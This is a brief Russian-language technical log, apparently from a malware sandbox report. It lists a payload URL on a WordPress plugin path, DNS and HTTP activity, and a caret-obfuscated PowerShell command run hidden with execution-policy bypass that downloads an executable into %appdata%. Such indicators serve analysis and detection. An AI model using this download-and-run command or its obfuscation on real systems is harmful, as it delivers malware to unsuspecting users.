Техническая информация
- http://aamd.com/wp-content/plugins/acismittor/0dgrhpzx/yl33kcob.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWe^r^s^hE^L^L.Exe^ -exe^C^utioNPO^lI^cY bypaS^S^ -^NoPrOFILE ^-WInd^ow^stY^l^E^ hI^D^d^e^N^ (^new^-obJec^T SYs^tEm^.^nEt.^W^E^B^c^LI^eNT).^do^wn^lOA^df^il^E^('http://aamd.com/wp-...
- 'aa##.com':80
- http://aa##.com/wp-content/plugins/acismittor/0DGRhPzx/yL33KCoB.exe
- DNS ASK aa##.com
- '<SYSTEM32>\cmd.exe' /C "p^OWe^r^s^hE^L^L.Exe^ -exe^C^utioNPO^lI^cY bypaS^S^ -^NoPrOFILE ^-WInd^ow^stY^l^E^ hI^D^d^e^N^ (^new^-obJec^T SYs^tEm^.^nEt.^W^E^B^c^LI^eNT).^do^wn^lOA^df^il^E^('http://aamd.com/wp-...' (со скрытым окном)